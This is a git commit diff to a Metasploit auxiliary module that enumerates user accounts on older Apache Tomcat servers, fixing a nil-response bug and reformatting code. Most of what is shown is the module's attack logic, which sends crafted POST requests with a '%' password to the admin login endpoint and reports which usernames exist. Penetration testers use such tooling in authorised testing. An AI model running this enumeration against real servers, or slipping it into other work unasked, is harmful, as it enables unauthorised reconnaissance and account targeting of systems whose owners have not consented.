do not access res.code if res is nil, fixes #2184
git-svn-id: file:///home/svn/framework3/trunk@9726 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
2de94b910b
commit
4705998f6c
|
@ -24,14 +24,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
super(
|
||||
'Name' => 'Apache Tomcat User Enumeration',
|
||||
'Version' => '$Revision$',
|
||||
'Description' => %q{Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 6.0.20, 5.5.28, and 4.1.40.},
|
||||
'Description' => %q{
|
||||
Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version
|
||||
6.0.20, 5.5.28, and 4.1.40.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'Alligator Security Team',
|
||||
'Heyder Andrade <heyder.andrade[at]gmail.com>',
|
||||
'Leandro Oliveira <leandrofernando[at]gmail.com>'
|
||||
],
|
||||
|
||||
'References' =>
|
||||
[
|
||||
['BID', '35196'],
|
||||
|
@ -42,7 +44,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
)
|
||||
|
||||
register_options(
|
||||
[ Opt::RPORT(8080),
|
||||
[
|
||||
Opt::RPORT(8080),
|
||||
OptString.new('URI', [true, 'The path of the Apache Tomcat Administration page', '/admin/j_security_check']),
|
||||
OptBool.new('VERBOSE', [ true, "Whether to print output for all attempts", true]),
|
||||
OptString.new('UserAgent', [ false, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible MSIE 6.0; Windows NT 5.1)' ]),
|
||||
|
@ -81,25 +84,30 @@ class Metasploit3 < Msf::Auxiliary
|
|||
post_data = "j_username=#{user}&password=%"
|
||||
vprint_status("#{target_url} - Apache Tomcat - Trying name: '#{user}'")
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'method' => 'POST',
|
||||
'uri' => datastore['URI'],
|
||||
'data' => post_data,
|
||||
}, 20)
|
||||
|
||||
if (res and res.code == 200 and res.headers['Set-Cookie'])
|
||||
if res
|
||||
if res.code == 200
|
||||
if res.headers['Set-Cookie']
|
||||
vprint_status("#{target_url} - Apache Tomcat #{user} not found ")
|
||||
elsif (res.code == 200)
|
||||
else
|
||||
print_good("#{target_url} - Apache Tomcat #{user} found ")
|
||||
@users_found[user] = :reported
|
||||
end
|
||||
end
|
||||
else
|
||||
print_error("#{target_url} - NOT VULNERABLE")
|
||||
return :abort
|
||||
end
|
||||
|
||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue